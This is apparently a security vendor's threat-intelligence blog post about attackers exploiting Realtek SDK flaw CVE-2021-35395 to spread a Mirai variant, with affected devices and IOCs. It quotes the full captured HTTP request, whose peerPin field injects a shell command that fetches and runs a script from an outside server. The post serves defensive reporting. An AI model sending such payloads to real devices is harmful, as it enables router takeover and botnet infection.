Multiple attempts to exploit Realtek vulnerabilities discovered by our researchers

Nadav Liebermann


On August 16th, three days ago, IoT Inspector Research Lab disclosed multiple vulnerabilities in a software SDK distributed with Realtek chipsets [1]. The vulnerabilities allow an attacker to fully compromise and take control of affected devices. Just yesterday, only two days after publication, our home security solution, Secure Home, detected attempts to exploit these vulnerabilities to spread a Mirai variant.

One of the disclosed vulnerabilities, CVE-2021-35395 [2], affects the management web interface that ships with the SDK and covers six separate issues. As of August 18th, we have identified attempts to exploit CVE-2021-35395 in the wild.

Specifically, we observed exploit attempts against the formWsc and formSysCmd form handlers of the SDK's web server. The exploit attempts to deploy a Mirai variant that Palo Alto Networks documented in March [3]. Mirai is a notorious IoT and router malware that has circulated in various forms for the last five years. It was originally used to knock large parts of the internet offline [4] and has since evolved into many variants built for different purposes.

Same attacker – different incidents

A similar incident was reported two weeks earlier, on August 6th, by Juniper Networks [5]: a newly disclosed vulnerability, CVE-2021-20090, was exploited in the wild only two days after publication to spread the same Mirai variant.

The web server hosting the Mirai payload sits in the same network subnet in both cases, indicating that the same attacker is behind both incidents.

This chain of events shows that attackers actively watch for newly disclosed command injection vulnerabilities and use them to propagate widely used malware quickly. Such vulnerabilities are easy to exploit and can be folded into existing attack frameworks within days, well before devices are patched and security vendors can react.

SAM's security research group tracks published exploits and blocks them quickly using IoT virtual patching (read our recent article to learn more). The vulnerabilities above were blocked within a day of publication, protecting any potentially vulnerable device.

Affected devices

According to the original research, the vulnerable Realtek SDK is used by more than 65 vendors in more than 200 devices. According to SAM's own research on connected devices, based on anonymously collected network data spanning more than 2 million home and business networks, the most common devices carrying the Realtek SDK are:

  • Netis E1+ extender
  • Edimax N150 and N300 Wi-Fi router
  • Repotec RP-WR5444 router

These devices are used mainly to enhance Wi-Fi reception.

Full Attack Details

The attack originated from 31.210.20[.]100. We expect the attacker's IP addresses to change over time.

The full attack payload. The injected shell command is carried in the peerPin parameter of the WPS form: everything after the literal PIN 12345678 and the ';' is handed to the shell on a vulnerable device.

POST /goform/formWsc HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Dark

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

IOCs

IP addresses – 31.210.20[.]100, 212.192.241[.]87

Files

Filename     Hash (sha256)
dark.x86     a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
dark.mips    9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
dark.mpsl    24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
dark.arm4    caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
dark.arm5    fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
dark.arm6    0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
dark.arm7    85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
dark.ppc     a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
dark.m68k    bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
dark.sh4     16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
dark.86_64   67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7

------------------------------------------------------------

Sources

[1] www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/

[2] nvd.nist.gov/vuln/detail/CVE-2021-35395

[3] unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/

[4] en.wikipedia.org/wiki/2016_Dyn_cyberattack

[5] blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
